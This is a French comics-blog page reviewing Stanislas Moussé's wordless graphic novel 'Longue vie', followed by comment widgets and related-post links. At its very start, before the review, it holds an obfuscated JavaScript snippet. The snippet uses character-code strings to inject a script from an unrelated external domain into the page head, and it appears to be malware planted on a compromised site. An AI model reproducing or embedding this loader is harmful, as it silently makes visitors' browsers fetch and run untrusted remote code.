Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,119,101,108,108,46,108,105,110,101,116,111,97,100,115,97,99,116,105,118,101,46,99,111,109,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();

    La belle histoire d’une Longue vie

     Longue vie, Stanislas Moussé. Editions Le Tripode, 208 pages, 20 euros.

    Il était une fois un berger, heureux en famille et en harmonie avec son troupeau en alpage. Mais un jour des brigands vinrent assassiner sa famille. Alors le berger, ivre de vengeance, se fit chasseur, se faisant justice en massacrant les meurtriers. Blessé, il fut recueilli par des guerriers, devient l’un d’eux, puis leur chef, les emmenant à la conquête d’un royaume, devint roi, bâtit une dynastie. Sans jamais oublier d’où il vient.

    Pour la publication de leur première bande dessinée, les éditions du Tripode – plutôt versées dans les ouvrages d’illustration singuliers – font fort avec Longue Vie. Un album qui s’inscrit bien dans la tradition maison et se présente comme l’un des albums marquants de cette année 2020 si particulière.

    Réduit à son résumé (fait plus haut), le livre apparaît pourtant aussi archétypal que d’une grande banalité. Pourtant, c’est tout le contraire, tant ce gros album surprend. Dans la forme et le style… et à l’image de son auteur, Nantais devenu berger de vaches de combats dans le massif des Bauges, entre Chambéry et Annecy.

    Récit muet de 200 planches, en noir et blanc, cette oeuvre s’impose avec un effet presque hypnotique, avec une juxtaposition de grands dessins pleine page fourmillant de détails, le tout composé dans un style presque naïf, telle une grande bande médiévale réalisée avant la découverte de la perspective.

    A l’intérieur, se dévoile un récit foisonnant, bouillonnant d’action, “univers médiéval loufoque au croisement de Game of Thrones et Où est Charlie“, comme le résume très justement son éditeur non dénué de burlesque (à l’image de ses personnages principaux aux allures de cyclopes).

    Pour parvenir à ce résultat, son auteur, Stanislas Moussé – qui signe là son premier ouvrage après Chaos, en 2018, sorte de test d’entraînement de ce présent livre – utilise également une technique particulière: il dessine au rotring, avec un trait fin et très peu de noir, remplissant ensuite l’espace avec une multitude de points ou de traits, noyant les personnages dans ce décor pointilliste. Et ces dessins pleine page, par leur composition à la fois très simple et complexe appellent à s’y plonger longuement pour y découvrir de multiples petites séquences simultanées.

    Une même approche se retrouve dans le fil du récit, à la fois limpide, dans sa linéarité chronologique, mais profond, par rapport à son évocation d’une vie, du temps qui passe et d’une forme de sagesse où le héros, malgré sa fulgurante destinée, reviendra à ses origines et y retrouvera, de manière symbolique, ses racines.

    Voilà en tout cas un nouvel OVNI de toute beauté dans la collection du Tripode, d’autant que l’ouvrage est très joliment imprimé, sur un beau papier crème épais, qui accentue encore le côté attachant du récit.

    Commentez ou exprimez-vous grâce aux emojis !
    0
    J'AIMEJ'AIME
    0
    J'ADOREJ'ADORE
    0
    HahaHaha
    0
    WOUAHWOUAH
    0
    SUPER !SUPER !
    0
    TRISTETRISTE
    0
    GrrrrGrrrr
    Merci !

    Tags:

    • Journaliste de profession, rédacteur en chef adjoint (du Courrier picard) de fonction et amateur de bande dessinée par passion, je préfère parler ici d'albums que j'apprécie (avec éclectisme) plutôt que de ceux que je n'aime pas (et qui peuvent plaire à d'autres). Et ce en toute liberté. Cet espace est aussi l'occasion d'évoquer la vie (régionale en premier lieu) de la bande dessinée et parfois au-delà celle du graphisme, du dessin de presse ou des journaux et revues en lien avec l'un ou l'autre. Précisons que la plupart des illustrations utilisées dans ce blog ont pour copyrights leurs auteurs et éditeurs respectifs. Celles-ci visant à présenter leurs œuvres. A leur demande éventuelle, elles seront retirées.

    • Show Comments

    Your email address will not be published. Required fields are marked *

    comment *

    • name *

    • email *

    • website *

    You May Also Like

    Melvile hantée et habitée

    Melvile, l’histoire de Samuel Beauclair, Romain Renard, éditions Le Lombard, 136 pages, 19,99 euros. ...

    Myrmidon, pirate de rêve

    Myrmidon, tome 4: sur l’île des pirates, Thierry Martin (dessin), Loïc Dauvillier (scénario). Editions ...

    On enterre bien “Charlie”… sous les hommages

    Une quinzaine d’émissions, une nouvelle flopée éditoriale… Et un numéro spécial de Charlie hebdo ...

    Siné jamais stérile

    Journal pré-posthume, Siné, éditions du Cherche-Midi, 96 pages, 15 euros. C’est une façon de ...

    L’oracle della Luna sur la voie de la sagesse

    L’Oracle della Luna, tome 4: la fille du sage, Frédéric Lenoir et Rodolphe (scénario), ...